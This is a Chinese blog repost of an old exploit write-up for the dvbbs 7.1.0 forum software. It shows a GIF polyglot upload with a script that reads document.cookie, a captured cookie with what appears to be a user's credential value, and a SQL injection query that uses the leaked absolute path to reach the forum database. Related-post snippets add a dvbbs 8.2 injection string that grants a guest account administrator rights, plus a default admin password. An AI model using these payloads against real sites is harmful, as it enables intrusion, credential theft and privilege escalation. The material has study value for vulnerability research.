dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞

最新推荐文章于 2022-11-22 16:15:58 发布
最新推荐文章于 2022-11-22 16:15:58 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: Asp.Net ASP 文章标签: 测试 sql 数据库 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chinawn/article/details/412970
版权
动网官方与站长站均存在严重漏洞,可大致入侵,内有说名,请尽快修复!
dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞
dvbbs 7.1.0 的cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现sql跨库查询等。
漏洞利用例子:
一、泄露绝对漏洞测试:
对官方的测试站点:bbs.dvbbs.net
上传一张图,代码如下:
gif89a
[code]<script>
alert(document.cookie)
</script>[/code]
抓包得到cookie如下
cookie: aspsessionidssdscbqd=nhanobncapcpamcfmagdijcb; dwebdvbbs7%2e1%2e0=userid=617054&usercookies=1&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&username=linzibct&password=t8ob621664s5v6hl&userhidden=2&statuserid=2189992004; dvbbs=
分析cookie可以得到站点的绝对路径如下:
d://web//dvbbs7为论谈的绝对路径
二、攻击延伸:
www.host.com
主程序存在sql注入漏洞,但是找不到表名和字段名。
注入点假设:
www.host.com//linzi.asp?****=you
论谈为dvbbs 7.1.0 ,数据库为datadvbbs.asp,做了防下载处理.
利用上面的动网暴路径,抓包得到绝对路径为 d://www//dvbbs//data//dvbbs.asp
实现跨库查询如下:
www.host.com//linzi.asp?****=you and (select count(*) from dv_admin in "d://www//dvbbs//data//dvbbs.asp")
官方补丁:
尚无
dvbbs7.1sp1最新漏洞的研究和利用
孤剑之家
06-05 5180
[怪狗] 发表于2006-05-12 00:02
WordPress博客出现的绝对路径泄露漏洞及修复方法
09-28
主要介绍了WordPress出现的绝对路径泄露漏洞及修复方法,需要的朋友可以参考下
文件绝对路径泄露
fansenliangren的博客
11-22 4203
在网站系统对用户提交的非法请求回复错误信息,或HTML、JaveScript等源码书写疏忽等情况下,易发生服务器系统某些文件的绝对路径泄露。通过制造报错使应用泄露出应用在主机中的绝对地址路径,攻击者可以通过泄露绝对路径,分析网站结构,为后续上传恶意后门(如webshell等)创造了条件。
PHP网站路径泄漏,WordPress出现的绝对路径泄露漏洞及修复方法
weixin_34355933的博客
03-19 1175
现在很多朋友开始使用360网站卫士来检测网站漏洞,我刚刚尝试了一下,耗费时间大概需要50分钟,发现基于WordPress 的站点还是会检测出一些漏洞,虽然不知道这些漏洞是否是高危漏洞,而且由于本人对这块没有研究,不知道是否会影响网站的安全和运行,但是还是想完善这些检测出来的漏洞。只要检测出来的绝对路径漏洞,我们就可以相对这些文件来完善修复这些漏洞。下面我就针对自己的网站检测出来的漏洞来说说。漏洞...
安全漏洞:JS文件中暴露系统绝对路径
阿强的博客
04-26 1472
鼎折覆餗
Dvbbs7.1.0_SQL
03-18
默认管理帐号:用户名:admin,密码:admin888
虚拟股市2.0.0_Dvbbs7.1.0
03-05
简介: 1:多风格支持(独立窗口). 2:首页开户提示功能(详细提示是否可以开户).... 3:完善的帐户保密设置.... 4:内置过户功能方便股民资金交换.... 5:详细的交易提示功能交易时即时计算交易资金流向情况....
Dvbbs 7.1.0论坛程序下载
11-04
Dvbbs 7.1.0论坛程序下载】是一个针对中文互联网社区的软件解决方案,尤其在【动网论坛】这个标签下,我们可以推断它是一个基于PHP和MySQL的论坛系统。Dvbbs(Discuz! Board)是知名的论坛软件之一,由康盛创想...
下载已补丁Dvbbs 7.1.0论坛程序完整版
从描述中可以了解到,下载的Dvbbs 7.1.0论坛程序已经被打好补丁,意味着一些已知的安全漏洞或者功能上的缺陷已经被修复。在互联网上,论坛程序的安全性极为重要,尤其是在过去,很多论坛由于安全漏洞,容易遭受攻击...
火车头 V3_Dvbbs_7.1.0_Sp1 模块及发布注意事项 下载
10-01
【火车头 V3_Dvbbs_7.1.0_Sp1 模块及发布注意事项】 火车头是一款广泛应用于互联网数据抓取、处理和发布的工具,适用于多种论坛平台,其中包括动网论坛(Dvbbs)的7.1.0_SP1版本。在使用火车头与动网论坛结合进行...
NET IIS暴绝对路径漏洞
10-31
NET IIS暴绝对路径漏洞
DVBBS 8.2 漏洞利用
caiguazheng4921的博客
04-19 255
在用户名处写入“';update dv_user set usergroupid=1 where username='guest'--”密码我就用正确的来写然后写好后登陆看到反回的信息我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“guest”已经为管理员了。 现在我们已经是前台管理员了。 那么怎样才能让我们的帐户具有后台权限呢?我们继续来到lo...
全路径泄漏
iteye_16188的博客
11-17 761
参考: https://www.owasp.org/index.php/Full_Path_Disclosure http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt (一)危害 1)/var/www/html 可能导致文件夹遍历或LFI漏洞 2)/home/vicky/public_html/ ...
绝对路径泄漏 java_用Java程序获取绝对路径
weixin_29224309的博客
03-04 574
情况是这样的:我的Tomcat装在了c盘,而我的虚拟目录设在了E:/work下, 我在E:/work/test/image下有个图片,test.gif 我想通过程序删掉它,但他的绝对路径不确定(为了考虑到程序以后的移植,绝对路径是不确定的)。假设del.jsp文件在e:/work/test 下,用下面的程序好像可以删掉:删除成功页面File f=new File("/image/",test.gi...
aspx暴绝对路径漏洞
weixin_30648963的博客
10-16 861
aspx暴绝对路径漏洞 意外的发现 baidu.com里扫: inurl:aspx找到很多ASPX的站.随便进一个.http://www.sg.com.cn/jpbbs/denglu.aspx这里吧.写成这样:http://www.sg.com.cn/jpbbs/~denglu.aspx回车, 出现错误信息如下:========错误信息===============“/jpbb...
PHP FirstPost存在路径泄露漏洞
weixin_33772645的博客
06-13 145
  受影响系统:   PHP FirstPost PHP FirstPost 0.1   描述:   BUGTRAQ ID: 4274   CVE(CAN) ID: CVE-2002-0445   PHP FirstPost是一款PHP WEB日志程序,包含一个开放的提议队列和评估系统。   PHP FirstPost对不存在的页面请求处理不正确,可导致www...
Dvbbs Version 8.2.0 漏洞
热门推荐
stilling2006的专栏
07-19 2万+
影响版本: Powered By Dvbbs Version 8.2.0 Powered By Dvbbs Version 8.1.0 Powered By Dvbbs Version 8.0.0 还是批量,直接Google上面的任一 注册用户-我的主页-个人空间管理 userspace.asp?sid=0&act=modifyset 然后编辑CSS风格【一定要有看到代码才算
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值